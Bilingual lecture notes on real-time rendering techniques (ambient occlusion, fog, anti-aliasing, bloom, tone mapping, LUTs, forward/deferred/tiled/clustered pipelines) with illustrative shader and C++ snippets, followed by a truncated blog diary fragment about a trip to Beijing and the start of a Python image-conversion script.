    ​简单来说,环境光遮蔽就是在渲染场景时,考虑物体表面在环境光照射下的遮挡情况,对每个像素点进行采样,并计算出该像素点受到的周围物体的影响程度,最终得到一张带有阴影效果的图像。

    • Approximation of attenuation of ambient light due to occlusion

      由于遮挡而导致的环境光衰减的近似值

    webp

    Precomputed AO

    Using ray tracing to compute the AO offline and store the result into texture, which is widely used in object modeling process

    ​利用光线追踪离线计算 AO 并将结果存储到纹理中,广泛应用于物体建模过程。(空间换时间)

    • Extra storage cost

      额外的存储费用

    • Only apply to static object

      仅适用于静态对象

    webp

    Screen Space Ambient Occlusion (SSAO)

    ​屏幕空间环境光遮挡(SSAO)

    webp

    webp

    • Generate $N$ random samples in a sphere around each pixel $p$ in view space

      在视图空间中每个像素 $p$ 周围的球体中生成 $N$ 个随机样本

    • Test sample occlusions by comparing depth against depth buffer

      通过将深度与深度缓冲区进行比较来测试样本遮挡

    • Average visibility of sample points to approximate AO

      采样点的平均可见度以近似 AO
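
    把这三步压缩成一个 GLSL 草图如下。假设 G-Buffer 存有视空间位置;采样核、偏置与所有命名均为示意,常见的防光晕 range check 也为简洁起见省略了。

    uniform sampler2D gPosition;            // view-space position G-Buffer
    uniform mat4 projection;
    const int N_SAMPLES = 16;
    uniform vec3 samples[N_SAMPLES];        // random offsets inside a unit sphere
    uniform float radius;                   // sample sphere radius in view space

    float ssao(vec2 uv) {
        vec3 p = texture(gPosition, uv).xyz;
        float occlusion = 0.0;
        for (int i = 0; i < N_SAMPLES; ++i) {
            vec3 q = p + samples[i] * radius;          // random point near p
            vec4 clip = projection * vec4(q, 1.0);     // project back to screen space
            vec2 quv = clip.xy / clip.w * 0.5 + 0.5;
            float sceneDepth = texture(gPosition, quv).z;
            // Occluded if the visible surface is closer to the camera than the sample
            // (view space looks down -z, so "closer" means a larger z value).
            if (sceneDepth >= q.z + 0.025) occlusion += 1.0;
        }
        return 1.0 - occlusion / float(N_SAMPLES);     // average visibility ~ AO
    }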

    SSAO+

    webp

    • Recall the AO equation is actually done on the normal-oriented hemisphere

      回想一下 AO 方程实际上是在法向半球上完成的

    ​于是对 SSAO 进行改进,只在半球上采样。

    webp

    ​效果看上去更好了,但是还有些问题,比如水泥墩子后面有不合理的阴影。

    HBAO-Horizon-based Ambient Occlusion

    ​HBAO-基于水平线的环境光遮挡

    webp

    • Use the depth buffer as a heightfield on 2D surface

      使用深度缓冲区作为 2D 表面上的高度场

    • Rays that below the horizon angle are occluded

      低于水平角的光线被遮挡

    HBAO Implementation

    ​HBAO 实现

    webp

    • Use the depth buffer as a heightfield on 2D surface

      使用深度缓冲区作为 2D 表面上的高度场

    • Trace rays directly in 2D and approximate AO from horizon angle

      直接在 2D 中追踪光线并从水平角近似 AO

    GTAO - Ground Truth-based Ambient Occlusion

    ​GTAO - 基于地面实况的环境光遮挡

    webp

    GTAO introduces the missing cosine factor, removes the attenuation function, and adds a fast approximation of multiple bounces

    ​GTAO 引入了缺失的余弦因子,去除了衰减函数,并添加了多次反射的快速近似

    Add multiple bounces by fitting a cubic polynomial per albedo

    ​通过拟合每个反照率的三次多项式来添加多次反射

    webp
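
    这条三次多项式拟合大致可以写成下面的样子。系数取自 GTAO 论文(Jimenez et al. 2016)中常被引用的拟合结果;函数名与具体常数都请当作示意,而非权威实现。

    // Multi-bounce approximation: brighter albedo lets bounced light partially
    // fill in the occlusion, so AO is lifted toward 1 per color channel.
    vec3 gtaoMultiBounce(float visibility, vec3 albedo) {
        // Cubic polynomial fitted per albedo (constants as quoted from the paper).
        vec3 a =  2.0404 * albedo - 0.3324;
        vec3 b = -4.7951 * albedo + 0.6417;
        vec3 c =  2.7552 * albedo + 0.6903;
        float x = visibility;
        return max(vec3(x), ((x * a + b) * x + c) * x);
    }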

    Ray-Tracing Ambient Occlusion

    ​光线追踪环境光遮挡

    webp

    • Casting rays from each screen pixel using RTT hardware

      使用 RTT 硬件从每个屏幕像素投射光线

      • 1spp(sample per-pixel) works well for far-field occlusion

        1spp(每像素样本)非常适合远场遮挡

      • With 2-4spp, can recover detailed occlusion in contact region

        使用 2-4spp,可以恢复接触区域的详细遮挡

    Fog Everything

    Depth Fog

    Linear fog: 线性雾

    • factor = (end-z)/(end-start)

    Exp fog: 指数雾

    • factor = exp(- density * z)

    Exp squared fog: 指数平方雾

    • factor = exp(-(density * z) ^ 2)

    webp
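
    上面三种雾化因子写成 GLSL 如下,z 为雾所使用的距离,factor 为 1 表示无雾;最终颜色通常为 mix(fogColor, sceneColor, factor)。函数名为示意。

    float linearFog(float z, float start, float end) {
        return clamp((end - z) / (end - start), 0.0, 1.0);
    }
    float expFog(float z, float density) {
        return exp(-density * z);
    }
    float expSquaredFog(float z, float density) {
        return exp(-pow(density * z, 2.0));
    }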

    Height Fog

    ​Height Fog(高度雾)是一种计算机图形学中的特效,可以模拟出真实世界中的大气层的效果。它通常被应用于游戏、电影等场景中,用于增强场景的逼真度和氛围感。

    ​在 Height Fog 中,雾的浓度随高度按指数衰减:越靠近地面雾越浓,越高雾越稀薄,从而形成逐渐模糊、逐渐淡化的效果。同时,Height Fog 还可以调整雾的颜色、密度、高度等参数,以达到不同的视觉效果。

    ​Height Fog 主要用于模拟自然环境中的大气层效果,例如山区、森林、海洋等场景。通过 Height Fog 的渲染,可以使得场景更加真实、自然,并且能够增强场景的情感和氛围感。

    webp

    • Height Fog integration along view direction

      沿观察方向对高度雾进行积分

      $D(h)=D_{max}\cdot e^{-\sigma\cdot\max(h-H_s,\,0)}$

      FogDensityIntegration

      雾密度积分

      $=D_{max}\cdot d\int_{0}^{1}e^{-\sigma\cdot\max(v_{z}+t\cdot d_{z}-H_{s},\,0)}\,dt=D_{max}\cdot d\cdot e^{-\sigma\cdot\max(v_{z}-H_{s},\,0)}\cdot\frac{1-e^{-\sigma\cdot d_{z}}}{\sigma\cdot d_{z}}$

    • Fog color after transmission

      传输后的雾色

      $\text{FogInscatter}=1-e^{-\text{FogDensityIntegration}}$

      $\text{FinalColor}=\text{FogColor}\cdot\text{FogInscatter}$
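
    ​A C++ sketch of the closed-form integration above. Variable names follow the formula ($D_{max}$, $\sigma$, $H_s$, camera height $v_z$, ray length $d$ with vertical component $d_z$); the closed form assumes the $\max(\cdot,0)$ clamp behaves the same way along the whole ray, so treat this as an illustration rather than engine code.

    #include <algorithm>
    #include <cmath>
    #include <cstdio>

    float fogDensityIntegration(float Dmax, float sigma, float Hs,
                                float vz, float dz, float d)
    {
        float start = std::exp(-sigma * std::max(vz - Hs, 0.0f));
        float ratio = (std::fabs(sigma * dz) > 1e-5f)
                    ? (1.0f - std::exp(-sigma * dz)) / (sigma * dz)  // analytic integral term
                    : 1.0f;                                          // limit for a horizontal ray
        return Dmax * d * start * ratio;
    }

    int main()
    {
        float integ     = fogDensityIntegration(0.05f, 0.1f, 0.0f, 2.0f, 10.0f, 50.0f);
        float inscatter = 1.0f - std::exp(-integ);     // FogInscatter = 1 - e^(-integration)
        std::printf("inscatter = %.3f\n", inscatter);  // FinalColor = FogColor * inscatter
    }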

    Voxel-based Volumetric Fog

    ​Voxel-based Volumetric Fog(基于体素的体积雾)是一种计算机图形学中的高级渲染技术。它通过将场景划分成小立方体(体素),并对每个体素进行采样和计算,从而模拟出真实世界中的体积雾效果。

    webp

    Anti-aliasing

    ​反走样

    Reason of Aliasing

    webp

    • Aliasing is a family of rendering artifacts caused by high-frequency signals being undersampled at limited rendering resolutions

      走样是由高频信号与有限渲染分辨率的采样不足引起的一系列渲染伪影

    Anti-aliasing

    webp

    The general strategy of screen-based anti-aliasing schemes is to use a sampling pattern to take more samples, then weight and sum them to produce the final pixel color

    ​基于屏幕的抗锯齿方案的一般策略是使用采样模式获取更多样本,然后对样本进行加权和求和以生成像素颜色

    Super-sample AA (SSAA) and Multi-sample AA (MSAA)

    ​超样本 AA (SSAA) 和多样本 AA (MSAA)

    • Super-sampling is the most straightforward anti-aliasing solution

      超采样是最直接的抗锯齿方案

    webp

    SSAA: 4x rendering resolution

    ​SSAA:4 倍渲染分辨率

    4x z-buffer and framebuffer

    ​4x z-缓冲区和帧缓冲区

    4x rasterization and pixel shading

    ​4x 光栅化和像素着色

    webp

    MSAA, only multi-sampling necessary pixels

    ​MSAA,仅多重采样必要的像素

    4x z-buffer and framebuffer

    ​4x z-缓冲区和帧缓冲区

    4x rasterization and 1+x pixel shading

    ​4x 光栅化和 1+x 像素着色

    FXAA (Fast Approximate Anti-aliasing)

    ​FXAA(快速近似抗锯齿)

    webp

    M: Luminance of middle pixel
    (L = 0.299 * R + 0.587 * G + 0.114 * B)

    #define MinThreshold 0.05

    float MaxLuma = max(max(max(N, E), max(W, S)), M);
    float MinLuma = min(min(min(N, E), min(W, S)), M);
    float Contrast = MaxLuma - MinLuma;
    if (Contrast >= MinThreshold)
        ...

    Anti-aliasing based on 1x rendered image

    ​基于 1x 渲染图像的抗锯齿

    • Find edge pixels by luminance

      通过亮度查找边缘像素

    • Compute offset for every edge pixel

      计算每个边缘像素的偏移量

    • Re-sample edge pixel by its offset to blend with a neighbor

      通过偏移量重新采样边缘像素以与邻居混合

    Compute Offset Direction

    ​计算偏移方向

    webp

    Edge Searching Algorithm

    ​边缘搜索算法

    webp

    • Find aliasing edge that the pixel is in

      查找像素所在的锯齿边缘

      • Record contrast luminance and average luminance of the current pixel and the offset pixel

        记录当前像素和偏移像素的对比度亮度和平均亮度

        $L_{avg}\quad L_{contrast}$

      • Search along the two perpendicular directions and calculate the average luminance

        沿两个垂直方向搜索并计算平均亮度

        $L_{edge1n}\quad L_{edge2n}$

      • Until $\text{abs}(L_{edge1n}-L_{current})>0.25L_{contrast}$ and $\text{abs}(L_{edge2n}-L_{current})>0.25L_{contrast}$

    Calculate Blend Coefficient

    ​计算混合系数

    webp

    • Compute blend coefficient

    targetP is the nearer edge end of CurrentP

    ​targetP 是 CurrentP 较近的边缘端

    if ($(L_{avg}-L_{current})\cdot(L_{avg}-L_{targetP})>0$)
        magnitude = 0;
    else
        magnitude = abs(0.5 - dst / edgeLength);

    Blend Nearby Pixels

    ​混合附近的像素

    • Compute blend coefficient

    webp

    PixelNewColor = Texture(CurrentP_UV + offset_direction * offset_magnitude)
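
    ​Putting the pieces together, a small self-contained C++ sketch of the blend rule above; variable names mirror the slide's pseudocode, and the final texture fetch is only indicated by a comment since it belongs to the shader.

    #include <cmath>
    #include <cstdio>

    // If the current pixel sits on the same side of the edge's average luminance
    // as the nearer edge end, don't blend; otherwise blend more toward the middle.
    float blendMagnitude(float Lavg, float Lcurrent, float Ltarget,
                         float dst, float edgeLength)
    {
        if ((Lavg - Lcurrent) * (Lavg - Ltarget) > 0.0f)
            return 0.0f;
        return std::fabs(0.5f - dst / edgeLength);
    }

    int main()
    {
        // In the shader: newColor = Texture(uv + offset_direction * magnitude).
        std::printf("magnitude = %.3f\n", blendMagnitude(0.5f, 0.3f, 0.8f, 1.0f, 8.0f));
    }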

    FXAA Result

    webp

    TAA (Temporal Anti-aliasing)

    ​TAA(时域抗锯齿)

    webp

    Utilize spatial-temporal filtering methods to improve AA stability in motion

    ​利用时空滤波方法提高运动中的抗锯齿稳定性

    webp
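
    ​The temporal accumulation at the heart of TAA fits in one line; the C++ sketch below shows only that step. Real TAA additionally reprojects the history buffer with motion vectors and clamps it against the current frame's neighborhood to reject stale samples.

    #include <cstdio>

    // Exponential moving average of the shading signal across frames.
    float taaResolve(float history, float current, float alpha = 0.1f)
    {
        return history + alpha * (current - history);
    }

    int main()
    {
        float hist = 0.0f;
        for (int frame = 0; frame < 30; ++frame)
            hist = taaResolve(hist, 1.0f);            // converges toward the true signal
        std::printf("history after 30 frames: %.3f\n", hist);
    }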

    Post-process

    But the real magic is in post-processing…

    ​图像后处理属于数字图像处理领域。

    webp

    Post-process in 3D Graphics refers to any algorithm that will be applied to the final image. It can be done for stylistic reasons (color correction, contrast, etc.) or for realistic reasons (tone mapping, depth of field, etc.)

    ​3D 图形中的后处理是指应用于最终图像的任何算法。可以出于风格原因(色彩校正、对比度等)或现实原因(色调映射、景深等)来完成此操作。

    Bloom Effect

    What is Bloom

    webp

    • The physical basis of bloom is that, in the real world, lenses can never focus perfectly

      光晕的物理基础是,在现实世界中,镜头永远无法完美对焦

    • Even a perfect lens will convolve the incoming image with an Airy disk

      即使是完美的镜头也会将传入的图像与艾里斑进行卷积

    Detect Bright Area by Threshold

    ​使用阈值法检测发光区域

    webp

    Find luminance (Y) by applying the standard coefficients for sRGB:

    ​查找亮度 (Y),应用 sRGB 的标准系数:

    $$Y=R_{lin}*0.2126+G_{lin}*0.7152+B_{lin}*0.0722$$

    float threshold;
    float4 computeHighlightArea()
    {
        [...] // first do normal lighting calculations and output results
        float4 scene_color = float4(lighting, 1.0f);
        // check whether fragment output is higher than threshold, if so output as highlight color
        float luminance = dot(scene_color.rgb, float3(0.2126f, 0.7152f, 0.0722f));

        float4 highlight_color = float4(0.0f, 0.0f, 0.0f, 1.0f);
        if (luminance > threshold)
            highlight_color = float4(scene_color.rgb, 1.0f);
        return highlight_color;
    }

    Gaussian Blur

    webp

    ​高斯模糊即使用二维正态分布的卷积核对图像进行卷积,见下方的核构造示例。
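
    ​Because a 2D Gaussian is separable, engines blur with two cheap 1D passes (horizontal then vertical) instead of one full 2D convolution. A minimal C++ construction of the normalized 1D kernel:

    #include <cmath>
    #include <cstdio>
    #include <vector>

    std::vector<float> gaussianKernel1D(int radius, float sigma)
    {
        std::vector<float> w(2 * radius + 1);
        float sum = 0.0f;
        for (int i = -radius; i <= radius; ++i)
            sum += (w[i + radius] = std::exp(-(float)(i * i) / (2.0f * sigma * sigma)));
        for (float& v : w) v /= sum;   // normalize so overall brightness is preserved
        return w;
    }

    int main()
    {
        for (float v : gaussianKernel1D(2, 1.0f)) std::printf("%.3f ", v);
        std::printf("\n");
    }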

    Pyramid Gaussian Blur

    ​金字塔高斯模糊

    webp

    We can’t do all that filtering at high resolution, so we need a way to downsample and upsample the image

    ​我们无法以高分辨率完成所有滤波,因此需要一种对图像先下采样再上采样的方法

    Need a weight coefficient to tweak final effect

    ​需要一个权重系数来调整最终效果

    Bloom Composite

    ​混合形成 Bloom 效果。

    webp

    webp

    Tone Mapping

    ​色调映射

    webp

    • No way to directly display an HDR image on an SDR device

      无法在 SDR 设备中直接显示 HDR 图像

    • The purpose of the Tone Mapping function is to map the wide range of high dynamic range (HDR) colors into standard dynamic range (SDR) that a display can output

      色调映射功能的目的是将各种高动态范围 (HDR) 颜色映射到显示器可以输出的标准动态范围 (SDR)

    Tone Mapping Curve

    ​色调映射曲线

    webp

    float3 F(float3 x)
    {
        const float A = 0.22f;
        const float B = 0.30f;
        const float C = 0.10f;
        const float D = 0.20f;
        const float E = 0.01f;
        const float F = 0.30f;
        return ((x * (A * x + C * B) + D * E) / (x * (A * x + B) + D * F)) - E / F;
    }

    float3 Uncharted2ToneMapping(float3 color, float adapted_lum)
    {
        const float WHITE = 11.2f;
        return F(1.6f * adapted_lum * color) / F(WHITE);
    }
    • Get a filmic look without making renders dirty

      获得电影般的外观而不会使渲染变脏

    • Give images proper contrast and nicely roll off any pixels over 1

      为图像提供适当的对比度,并很好地滚掉超过 1 的任何像素

    ACES

    webp

    ​Academy Color Encoding System(ACES)是一种由美国电影艺术与科学学会(Academy of Motion Picture Arts and Sciences)开发的颜色管理系统。它旨在提供一种标准化的数字图像工作流程,以便在不同的硬件和软件平台上保持一致的颜色表现和图像质量。

    ​ACES 的主要目标是解决数字媒体制作中的颜色管理问题,确保从拍摄到后期制作再到最终呈现的整个过程中,颜色能够被准确和一致地处理。ACES 采用高动态范围(HDR)和广色域的工作方式,可以捕捉和表现更丰富的颜色和亮度细节。

    • Academy Color Encoding System

      学院颜色编码系统

      • Primarily for Film & Animation

        主要用于电影和动画

      • Interesting paradigms and transformations

        有趣的范式和变换

    • The useful bits

      有用的部分

      • Applying Color Grading in HDR is good

        在 HDR 中应用颜色分级效果很好

      • The idea of a fixed pipeline up to the final ODT (Output Device Transform) stage is good

        在最终 ODT(输出设备变换)阶段之前采用固定管线的想法很好

        • Separates artistic intent from the mechanics of supporting different devices

          将艺术意图与支持不同设备的机制分开
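
    ​For reference, many games approximate the ACES filmic curve at runtime with Krzysztof Narkowicz's rational fit instead of running the full ACES transform chain. This is not from the course slides, just a commonly used stand-in:

    #include <algorithm>
    #include <cstdio>

    // Fitted approximation of the ACES tone curve (per channel, linear in/out).
    float acesApprox(float x)
    {
        const float a = 2.51f, b = 0.03f, c = 2.43f, d = 0.59f, e = 0.14f;
        return std::clamp(x * (a * x + b) / (x * (c * x + d) + e), 0.0f, 1.0f);
    }

    int main()
    {
        std::printf("HDR 4.0 -> SDR %.3f\n", acesApprox(4.0f));  // rolls off toward 1
    }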

    HDR and SDR Pipeline

    ​HDR 和 SDR 管道

    webp

    • Visual consistency between HDR / SDR

      HDR / SDR 之间的视觉一致性

    • Similar SDR results to previous SDR color pipeline

      与之前的 SDR 颜色管道类似的 SDR 结果

    • High quality

      高质量

    • High performance

      高性能

    • Minimal disruption to art teams

      对艺术团队的干扰最小化

      • Simple transition from current color pipeline

        从当前颜色管道简单过渡

      • Minimal additional overhead for mastering HDR and SDR

        同时制作 HDR 和 SDR 输出的额外开销最小

    Tone Mapping Curve Comparison

    ​色调映射曲线比较

    webp

    Color Grading

    ​颜色分级

    webp

    Lookup Table (LUT)

    ​查找表 (LUT)

    webp

    • LUT is used to remap the input color values of source pixels to new output values based on data contained within the LUT

      LUT 用于根据 LUT 中包含的数据将源像素的输入颜色值重新映射到新的输出值

    • A LUT can be considered as a kind of color preset that can be applied to image or footage

      LUT 可以被视为一种可应用于图像或素材的颜色预设

    LUT 3D or 2D

    webp
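
    ​Sampling a 3D LUT is ordinary trilinear filtering, which GPU texture hardware gives for free; a 2D LUT stores the same cube as a strip of slices and interpolates the slice axis manually. The CPU-side C++ sketch below makes the arithmetic explicit (the identity LUT in main only exists so the snippet runs standalone).

    #include <algorithm>
    #include <cstdio>
    #include <vector>

    struct RGB { float r, g, b; };

    RGB sampleLUT(const std::vector<RGB>& lut, int N, RGB c)  // c in [0,1]^3, N >= 2
    {
        auto at   = [&](int r, int g, int b) -> const RGB& { return lut[(b * N + g) * N + r]; };
        auto lerp = [](float a, float b, float t) { return a + (b - a) * t; };
        auto mix  = [&](const RGB& a, const RGB& b, float t) {
            return RGB{ lerp(a.r, b.r, t), lerp(a.g, b.g, t), lerp(a.b, b.b, t) };
        };
        float fr = c.r * (N - 1), fg = c.g * (N - 1), fb = c.b * (N - 1);
        int r0 = std::min((int)fr, N - 2), g0 = std::min((int)fg, N - 2), b0 = std::min((int)fb, N - 2);
        float tr = fr - r0, tg = fg - g0, tb = fb - b0;
        // 8 corner fetches blended along r, then g, then b (trilinear filtering).
        RGB c00 = mix(at(r0, g0,     b0    ), at(r0 + 1, g0,     b0    ), tr);
        RGB c10 = mix(at(r0, g0 + 1, b0    ), at(r0 + 1, g0 + 1, b0    ), tr);
        RGB c01 = mix(at(r0, g0,     b0 + 1), at(r0 + 1, g0,     b0 + 1), tr);
        RGB c11 = mix(at(r0, g0 + 1, b0 + 1), at(r0 + 1, g0 + 1, b0 + 1), tr);
        return mix(mix(c00, c10, tg), mix(c01, c11, tg), tb);
    }

    int main()
    {
        const int N = 2;                       // trivial 2x2x2 identity LUT
        std::vector<RGB> lut(N * N * N);
        for (int b = 0; b < N; ++b)
            for (int g = 0; g < N; ++g)
                for (int r = 0; r < N; ++r)
                    lut[(b * N + g) * N + r] = { (float)r, (float)g, (float)b };
        RGB out = sampleLUT(lut, N, { 0.25f, 0.5f, 0.75f });
        std::printf("%.2f %.2f %.2f\n", out.r, out.g, out.b);  // identity => unchanged
    }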

    Artist Friendly Tools

    ​PS 之类的软件都可以创建 LUT。

    webp

    webp

    Color grading is the most cost-effective feature of game rendering

    ​颜色分级是游戏渲染中最具成本效益的功能

    Rendering Pipeline

    ​回顾一下渲染管线。

    One Equation for Everything

    webp

    What We Learned about Rendering (1/4)

    webp

    What We Learned about Rendering (2/4)

    webp

    What We Learned about Rendering (3/4)

    webp

    What We Learned about Rendering (4/4)

    webp

    Rendering Pipeline

    webp

    • Rendering pipeline is the management of the order in which all rendering operations execute and of how resources are allocated

      渲染管线管理着所有渲染操作的执行顺序和资源分配

    Forward Rendering

    for n meshes
        for m lights
            color += shading(mesh, light)

    ​按顺序渲染。

    webp

    Sort and Render Transparent after Opaque Objects

    webp

    ​透明物体需要排序,并在不透明物体之后渲染。

    Rendering with Many Lights

    ​渲染多个光源。

    Deferred Rendering

    延迟渲染

    webp

    webp

    Pros

    • Lighting is only computed for visible fragments

      仅针对可见片段计算光照

    • The data from the G-Buffer can be used for post-processing

      G-Buffer 中的数据可用于后处理

    Cons

    • High memory and bandwidth cost

      高内存和带宽成本

    • No support for transparent objects

      不支持透明物体

    • Not friendly to MSAA

      对 MSAA 不友好
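
    ​A CPU-side caricature of the two-pass structure, with purely illustrative types: the G-Buffer stores shading inputs per pixel, and the lighting pass then loops pixels × lights with no geometry in sight, which is why its cost no longer depends on scene complexity.

    #include <algorithm>
    #include <cstdio>
    #include <vector>

    struct GTexel   { float n[3]; float albedo[3]; };    // per-pixel normal + base color
    struct DirLight { float dir[3]; float color[3]; };   // directional lights for brevity

    // Pass 2 of deferred rendering: shade once per surviving pixel.
    void lightingPass(const std::vector<GTexel>& g, const std::vector<DirLight>& lights,
                      std::vector<float>& out)           // 3 floats per pixel
    {
        for (size_t p = 0; p < g.size(); ++p)
            for (const DirLight& l : lights)
            {
                float ndl = std::max(0.0f, g[p].n[0] * l.dir[0] + g[p].n[1] * l.dir[1] + g[p].n[2] * l.dir[2]);
                for (int c = 0; c < 3; ++c)
                    out[3 * p + c] += ndl * g[p].albedo[c] * l.color[c];  // Lambert accumulate
            }
    }

    int main()
    {
        std::vector<GTexel>   g  = { { {0, 0, 1}, {1, 1, 1} } };
        std::vector<DirLight> ls = { { {0, 0, 1}, {1, 0.9f, 0.8f} } };
        std::vector<float>    out(3, 0.0f);
        lightingPass(g, ls, out);
        std::printf("%.2f %.2f %.2f\n", out[0], out[1], out[2]);
    }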

    Tile-based Rendering

    ​Tile-based Rendering(基于图块的渲染)将屏幕划分为固定大小的小图块(例如 16×16 像素),并以图块为单位组织光照计算。

    ​在朴素的多光源渲染中,每个像素都要遍历场景里的全部光源,即使某个光源根本影响不到该像素,也会白白消耗计算量和带宽,场景越复杂浪费越明显。

    ​基于图块的渲染先为每个图块求出可能影响它的光源列表(光源剔除),着色时每个像素只需遍历所在图块的光源列表,从而大幅减少无效的光照计算。

    webp

    Light Culling by Tiles

    webp

    Depth Range Optimization

    ​深度范围优化

    webp

    • Get Min/Max depth per tile from Pre-z pass

      从 Pre-z pass 获取每个图块的最小/最大深度

    • Test depth bounds for each light

      测试每个光源的深度范围,见下方示例
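
    ​A C++ sketch of the depth-bounds test above. Only the depth-interval overlap is shown; a real tiled culling pass also tests each light volume against the tile's frustum side planes (all names are illustrative).

    #include <cstdio>
    #include <vector>

    struct PointLight { float z; float radius; };  // view-space depth + range

    std::vector<int> cullLightsForTile(float tileMinZ, float tileMaxZ,
                                       const std::vector<PointLight>& lights)
    {
        std::vector<int> visible;
        for (int i = 0; i < (int)lights.size(); ++i)
        {
            // The light's interval [z - r, z + r] must overlap the tile's [min, max].
            if (lights[i].z + lights[i].radius >= tileMinZ &&
                lights[i].z - lights[i].radius <= tileMaxZ)
                visible.push_back(i);   // joins this tile's light list
        }
        return visible;
    }

    int main()
    {
        std::vector<PointLight> lights = { {5.0f, 1.0f}, {50.0f, 2.0f} };
        auto list = cullLightsForTile(4.0f, 10.0f, lights);
        std::printf("lights kept for tile: %zu\n", list.size());  // only the first one
    }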

    Tile-based Deferred Rendering

    webp

    Forward+ (Tile-based Forward) Rendering

    ​Forward+(基于图块的前向)渲染

    webp

    • Depth prepass (prevent overdraw / provide tile depth bounds)

      深度预通道(防止过度绘制/提供图块深度边界)

    • Tiled light culling (output: light list per tile)

      分块光源剔除(输出:每个图块的光源列表)

    • Shading per object (PS: iterate through the light list calculated in light culling)

      每个物体的着色(在像素着色器中遍历光源剔除阶段得到的光源列表)

    Cluster-based Rendering

    ​Cluster-based Rendering(基于簇的渲染,即 Clustered Shading)是对基于图块的光源剔除的进一步细分:除了在屏幕空间划分图块,还沿深度方向把视锥体切成若干层,从而将整个视锥体划分成三维的小簇(cluster)。

    ​每个簇各自维护一份可能影响它的光源列表。由于在深度方向也做了划分,深度相差很远的前后物体不再共享同一份光源列表,光源剔除比纯图块方案更精确。

    ​着色时,像素根据屏幕坐标和视深度找到自己所属的簇,只遍历该簇的光源列表即可,见下方的簇索引计算示例。

    webp
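
    ​A typical cluster lookup, as referenced above: tiles in X/Y plus exponential slices in depth, so clusters stay roughly cube-shaped in view space. The constants are illustrative defaults, not values from the course.

    #include <cmath>
    #include <cstdio>

    int clusterIndex(int px, int py, float viewZ,
                     int tileSize, int tilesX, int tilesY,
                     int numSlices, float zNear, float zFar)
    {
        int cx = px / tileSize;
        int cy = py / tileSize;
        // Exponential depth slicing: slice boundaries grow geometrically with distance.
        int cz = (int)(std::log(viewZ / zNear) / std::log(zFar / zNear) * numSlices);
        return (cz * tilesY + cy) * tilesX + cx;
    }

    int main()
    {
        std::printf("cluster = %d\n", clusterIndex(640, 360, 25.0f, 64, 30, 17, 16, 0.1f, 1000.0f));
    }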

    Visibility Buffer

    webp

    Real Rendering Pipeline

    webp

    Challenges

    webp

    • Complex parallel work needs to synchronize with complex resource dependency

      复杂的并行工作需要与复杂的资源依赖同步

    • Large amount of transient resources whose lifetime is shorter than one frame

      大量瞬态资源,其生命周期短于一帧

    • Complex resource state management

      复杂的资源状态管理

    • Exploit newly exposed GPU features without requiring extensive low-level knowledge from users

      无需广泛的用户低级知识即可利用新公开的 GPU 功能

    Frame Graph

    webp

    A Directed Acyclic Graph (DAG) of pass and resource dependency in a frame, not a real visual graph

    ​帧中通道和资源依赖关系的有向无环图 (DAG),而不是真正的可视化图
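
    ​A minimal C++ flavor of the idea: passes declare what they read and write, which hands the engine exactly the DAG it needs to order work, alias transient resources and cull dead passes. Real frame graphs are far richer; everything here is illustrative.

    #include <functional>
    #include <string>
    #include <vector>

    struct Pass {
        std::string name;
        std::vector<std::string> reads, writes;   // resource dependencies: the DAG edges
        std::function<void()> execute;
    };

    struct FrameGraph {
        std::vector<Pass> passes;
        void addPass(Pass p) { passes.push_back(std::move(p)); }
        void compileAndExecute() {
            // A real implementation topologically sorts by the read/write edges and
            // allocates transient resources; this sketch just runs in declared order.
            for (auto& p : passes) p.execute();
        }
    };

    int main() {
        FrameGraph fg;
        fg.addPass({ "GBuffer",  {},          {"gbuffer"},  []{ /* rasterize */ } });
        fg.addPass({ "Lighting", {"gbuffer"}, {"hdrColor"}, []{ /* shade */ } });
        fg.compileAndExecute();
    }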

    Render to Monitor

    ​渲染到显示器

    Screen Tearing

    ​Screen Tearing(屏幕撕裂)是一种在计算机和视频游戏中常见的图像问题。它通常出现在快速移动或相机旋转等情况下,导致图像出现水平分割线或不协调的图案,影响观看体验。

    ​Screen Tearing 的出现是由于显示器和 GPU 之间的同步问题。当 GPU 在渲染新帧时,如果显示器正在显示先前的帧,就会发生 Screen Tearing。这是因为显示器和 GPU 的帧速率不同步,导致部分新帧和部分旧帧同时显示在屏幕上,从而产生撕裂的效果。

    ​解决 Screen Tearing 的方法包括垂直同步(V-sync)和自适应同步(Adaptive-Sync)。垂直同步是一种通过锁定 GPU 的输出速度来匹配显示器的刷新速率的技术。它可以防止屏幕撕裂,但可能会导致输入延迟和帧率下降。自适应同步则是一种更高效的技术,它可以根据 GPU 的输出动态地调整显示器的刷新速率,以匹配 GPU 的速度,从而消除屏幕撕裂并保持更平滑的画面。

    webp

    In most games your GPU frame rate will be highly volatile

    ​在大多数游戏中,您的 GPU 帧速率会非常不稳定

    When a new GPU frame arrives in the middle of a screen refresh, screen tearing occurs

    ​当新的 GPU 帧在一次屏幕刷新进行到一半时到达,就会发生屏幕撕裂

    V-Sync Technology

    webp

    Synchronizing buffer swaps with the vertical refresh is called V-sync

    ​将缓冲区交换与垂直刷新同步称为 V-sync

    V-Sync can be used to prevent tearing, but frame rates are reduced, and mouse lag & stuttering ruin gameplay

    ​垂直同步可用于防止撕裂,但帧速率会降低,鼠标会出现滞后和卡顿,从而破坏游戏玩法

    Variable Refresh Rate

    ​可变刷新率(Variable Refresh Rate,VRR)是一种显示技术,用于动态调整显示器的刷新率,以匹配输入信号的帧率。传统的显示器通常以固定的刷新率(例如 60Hz 或 120Hz)工作,但 VRR 技术允许显示器根据实际的帧率来动态调整刷新率。

    ​VRR 技术最常见的实现是 AMD 的 FreeSync 和 NVIDIA 的 G-Sync。当显示器采用 VRR 技术时,它可以与图形处理单元(GPU)通信,以了解当前帧率,并相应地调整自己的刷新率。这意味着在低帧率情况下,显示器可以减少刷新率,而在高帧率情况下,可以增加刷新率,从而实现更流畅的画面表现。

    webp

    ]]>
    @@ -1975,7 +1975,7 @@ /posts/Diary-%E8%80%81%E5%84%BF%E5%8C%97%E5%84%BF%E4%BA%AC%E5%84%BF/
    + 这是前言军博会!
    凡哥😍go to peking 吗
    去看这个
    走!

    ​凡哥从未去过北京,他一直嚷嚷着有机会可以一去。刚好在小红书上看到了军博会的消息,于是就怂恿凡哥周末 5.19 勇闯北京!


    ​宿舍 3 人购买车票:

    • G6712 ¥48

      • 07:12 保定东
      • 07:38 高碑店东
      • 07:49 涿州东
      • 08:14 北京丰台
    • G6731 ¥57

      • 20:57 北京西
      • 21:39 保定东

    import os  # 处理文件和目录
    from PIL import Image  # 处理图片

    def convert_to_webp(input_file, output_file, quality=80):
        # 转换单个图片文件
        # input_file: 输入的图片文件路径
        # output_file: 输出的 webp 文件路径
        # quality: webp 文件质量,取值范围 1-100,默认值 80
        try:
